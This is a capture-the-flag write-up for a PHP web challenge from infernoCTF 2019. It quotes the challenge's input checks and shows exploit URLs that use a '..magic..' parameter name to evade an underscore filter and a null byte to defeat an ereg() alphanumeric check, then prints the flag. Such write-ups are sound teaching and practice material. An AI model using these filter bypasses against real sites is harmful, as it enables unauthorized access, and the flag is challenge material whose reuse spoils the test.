Rating: 5.0

# Dante's Personal Home Page
## 180

Dante has used some PHP on his site but it only allows magicians to enter. Show him your magical skills!!

Author : MrT4ntr4

# Solution

Our challenge is the following php file:
```php

```

To get the flag, we need to pass some checks which looks like contradictions.

First of all, we need to set `__magic__`, but our url cant contain `_`.
```php
if (isset ($_GET['__magic__'])) {
$magic = $_GET['__magic__'];

$check = urldecode($_SERVER['QUERY_STRING']);

if(preg_match("/_| /i", $check))
{
die("Get yourself some coffee");
}
```

After we succesfully complete the part above, we have to set the value to be alphanumeric only to continue, but to get the flag it has to contain `$dark$`.
```php
if (ereg ("^[a-zA-Z0-9]+$", $magic) === FALSE)
echo 'Only Alphanumeric accepted';
else if (strpos ($magic, '$dark$') !== FALSE)
{
if (!is_array($magic)){
echo "Congratulations! FLAG is : ".$flag;
}
```

## Bypassing no underline check:

For some dark magical reason, `$_GET['__magic__']` will also return `..magic..`. So we can use the following url parameter:

```
http://address:port?..magic..=arcane
```

## Bypassing alphanumeric check:

However, nothing but $dark$ magic will work on this mighty php wizard, but his `ereg()` charm protects him from any kind of non-alphanumeric magic.

However, his `ereg()` magic has a weakspot, and it only protects him until a null byte is encountered.

Casting the following will give us the flag:
```
http://address:port?..magic..=a%00$dark$
```

flag: `infernoCTF{1_gu3ss_y0ur_m4g1c_was_w4y_t00_d4rk}`

Original writeup (https://github.com/ioncodes/excusemewtf/tree/master/infernoCTF/2019/Web/Dante's%20Personal%20Home%20Page).